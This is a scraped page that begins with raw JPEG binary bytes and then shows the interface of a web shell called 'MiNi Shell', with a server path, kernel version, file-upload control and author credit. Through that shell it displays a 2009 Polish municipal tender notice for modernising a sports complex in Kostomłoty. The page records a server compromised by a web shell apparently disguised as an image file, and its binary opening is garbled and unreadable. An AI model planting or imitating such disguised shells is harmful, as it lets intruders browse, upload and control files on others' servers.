JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090911/153285-N-2009.html

<p class="kh_header"><b>Kostomłoty: Modernizacja gminnego kompleksu sportowego w Kostomłotach</b><br>
<b>Numer ogłoszenia: 153285 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kostomłoty , ul. Ślężna 2, 55-311 Kostomłoty, woj. dolnośląskie, tel. 071 3170283, faks 071 3170283 w.28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kostomloty.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja gminnego kompleksu sportowego w Kostomłotach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót przewidziany do wykonania :
  Roboty ogólnobudowlane                                   
          1.   Wykonanie ogrodzenia boiska
    Należy wykonać następujące prace:
a)    rozebrać istniejące ogrodzenie z siatki na słupkach stalowych wraz z bramą wjazdową i furtką
b)   wzdłuż ogrodzenia wykarczować krzaki zniwelować teren przy cokole i oczyścić cokół
c)    rozebrać uszkodzone cokoły betonowe w pozostałych wykuć gniazda dla osadzenia słupów i  
   słupków, od strony domków jednorodzinnych i od strony drogi pod słupki wykopać dołki 0,3x0,3 m   
   do głębokości 1,1m
d)  od strony domków jednorodzinnych i od strony drogi wykonać ogrodzenie z siatki plecionej z drutu     
  ocynk powlekany 2,5/3,6 wys. 4 m nad ogrodzeniem systemowym z paneli z drutu fi 5 mm ocynk +  malowanie  wys. paneli 2,0 m na słupkach stal. z rur ocynk  + malowanie o śr.76 mm i rozst. 2,50 m słupki dł. 7,0 m obsadzić w gruncie i obetonować stopa o wymiarach 0,30 x0,30 x 1,10 m (w rozkutym cokole) -  pełna wys. ogrodzenia 6,0 m od istniejącego cokołu, na pełnej wysokości zamontować rygle poziome z  rur fi 42 mm ocynkowane i malowane, przy słupkach narożnych i na długim odcinku na 
  	  słupku środkowym zamontować zastrzały z rur fi 60 ocynkowane i malowane
e)  od strony ogródków wykonać ogrodzenie systemowe (panelowe) z drutu fi 5 mm ocynk
+ malowanie  wys. 2,0 m na słupkach stal. z profila 60 x40 x2 ocynk + malowanie o rozst. 2,50 m obsadzonych w gruncie  i obetonowanych (w rozkutym cokole) - pełna  wys. ogrodzenia 2,0 m
f)  osadzić bramę dwuskrzydłową z furtką wys.2,3 m i szer. bramy 5,40 m oraz furtki 1,2 m z 
   	 paneli w ramach z rur stalowych fi 32mm na słupkach fi 100 mm z pasem dol. z blachy o  
   	 wys.25 cm - całość cynkowana ogniowo i malowana na kolor 
g)  w ogrodzeniu zamontować furtki systemowe jednoskrzydłowe panelowe ze słupkami stalowymi    
    szer. furtki  1,0m  -  szt. 4
h)  uzupełnić brakujące cokoły, istniejące cokoły oczyścić z luźnych elementów za pomocą 
 	   szczotek drucianych
i)  na całości cokołu betonowego wykonać przecierkę z zaprawy cementowej
j)  za bramkami  wykonać piłkochwyty z siatki sznurkowej wys. 6 m na słupkach stal. z rur 
    ocynk + malowanie śr.76 mm o rozst. 3,0 m obsadzonych w gruncie  i obetonowanych  
 k) ogrodzenie malować na kolor zielony (uzgodnić z inwestorem)


 2. Remont ławek na trybunach

    Należy wykonać następujące prace:
-   rozebrać istniejące ławki z desek wraz z konstrukcją drewnianą
-   wyrównać teren 
-   wykonać i zamontować konstrukcję stopni na trybuny z ceownika  100 i 80 (gięty na
     gorąco) łączony spawem ciągłym. Konstrukcję wykonać w formie kraty wg wzoru 
    istniejącej konstrukcji drewnianej. Jedna krata (rama ) posiada 4 stopnie 
    szer. 0,85 m 3 szt. , szer. 0,75 m 1 szt.  wys. stopnia 0,44 m oraz 5 kotew  l= 60 cm do 
    zabetonowania w otworach 0,30x0,30x0,80 m.  Ilość krat (ram) = 21 szt. Konstrukcję 
    zabezpieczyć przed korozją podkładem chlorokauczukowym oraz farbą nawierzchniową,
    pomiędzy kratami (ramami) wykonać stężenia z pręta fi 14
-   obłożyć stopnie i podstopnie z deskami iglastymi nasyconymi strugane dwustronnie 
    gr.32mm mocowanych do konstrukcji za pomocą wkrętów lub śrub fi 6 ocynkowanych z 
    łbem zaokrąglonym. Deski przed montażem przetrzeć papierem ściernym, po zmontowaniu 
    całość pomalować dwukrotnie farbą olejną wcześniej zagruntować pokostem
-   zamontować barierkę zabezpieczającą  z rur stalowych ocynkowanych fi 32mm 
    (zew 42,4 mm) o wysokości 1,10m  po wykonaniu całość pomalować

              3.    Prace zabezpieczające
 	    Należy wykonać następujące prace:
-   podczas remontu wygrodzić i oznakować teren.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.34.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wysokość wadium ustalono na kwotę 6 000 zł. (sześć tysięcy)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy:
        	 -  posiadają uprawnienia do wykonywania określonej dzia?łalności lub czynności, jeżeli ustawy  
                      nakładają obowiązek posiadania takich uprawnień;
               -  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
                  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych 
                   podmiotów do udostęp?nienia potencjału technicznego i osób zdolnych do wykonania 
                   zamówienia;
                -  nie podlegają wykluczeniu z postępowania o udzielenie za?mówienia na podstawie art. 24 ust.  
                 1 i 2 oraz spełniają warunki zawarte w art. 22 ust. 1ustawy Prawo zamówień publicznych;
	  - znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
2  Wykonawca zobowiązany jest zawrzeć umowę ubezpieczenia odpowiedzialności cywilnej za
                   szkody  na osobie i na mieniu wyrządzone przy realizacji niniejszej umowy z tytułu czynów 
                   niedozwolonych, na sumę ubezpieczenia nie niższą niż 100 % wynagrodzenia ryczałtowego brutto. 
                  Wykonawca zobowiązany jest utrzymywać ubezpieczenie przez cały okres wykonania niniejszej 
                   umowy, tj. do dnia podpisania przez Zamawiającego protokołu końcowego odbioru robót. 
                   Wykonawca zobowiązany jest w terminie do 5 dni od zawarcia umowy przedłożyć Zamawiającemu     
                   kopię polisy ubezpieczeniowej pod rygorem zawarcia umowy ubezpieczenia na koszt Wykonawcy 
                   przez Zamawiającego. ( w przypadku składania oferty przez podmioty występujące wspólnie, właściwe              
                  dokumenty muszą być złożone przez każdy podmiot)
3 Warunkiem przyjęcia oferty jest uwzględnienie w niej wszystkich zapisów zawartych w niniejszej  
       Siwz. Oferta będzie podlegać ocenie po spełnieniu w/w wymogów formalnych. Ocena spełniania  
       warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia, w  
       oparciu o złożone oświadczenia oraz dokumenty potwierdzające spełnienie tych warunków, wymagane  
       w specyfikacji istotnych warunków zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy dołączyć:
1  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności   gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. ( w przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone przez każdy podmiot)
2 Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i nie           
      podleganiu wykluczeniu zgodnie z art. 24 ust.1 i 2 Prawo zamówień publicznych. ( w przypadku            
     składania oferty przez podmioty występujące wspólnie, oświadczenie musi być złożone przez każdy podmiot)
3	Parafowany formularz postanowień umowy.   
4 Wykonawca musi wykazać, że w ciągu ostatnich 3 lat zrealizował co najmniej 1 robotę budowlaną  
   w zakresie zamówienia tj wykonania ogrodzeń  (o wartości nie mniejszej niż 100 000, 00 zł każda,    jako oddzielne zadanie). Do wykazu należy dołączyć dokumenty potwierdzające jakość wykonanych robót. Wykaz robót będzie nieważny bez potwierdzającego dokumentu należytego wykonania np. referencji, protokółu odbioru końcowego robót.
5  Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające ze wykonawca  
                  nie zalega z opłaceniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem 
                  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
                  wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem 
                  terminu składania ofert. ( w przypadku składania oferty przez podmioty występujące wspólnie, właściwe 
                 dokumenty muszą być złożone przez każdy podmiot)
6 Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8  
                 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
                 ( w przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone  
                 przez każdy podmiot)
7  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  
zamiast dokumentów wymienionych powyżej, składa dokumenty równoważne wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem.
8 Kserokopia wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.kostomloty.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kostomłoty ul.Ślężna 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2009 godzina 09:30, miejsce: Gminny Ośrodek Kultury w Kostomłotach ul.Rynek 25, 55-311 kostomłoty.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com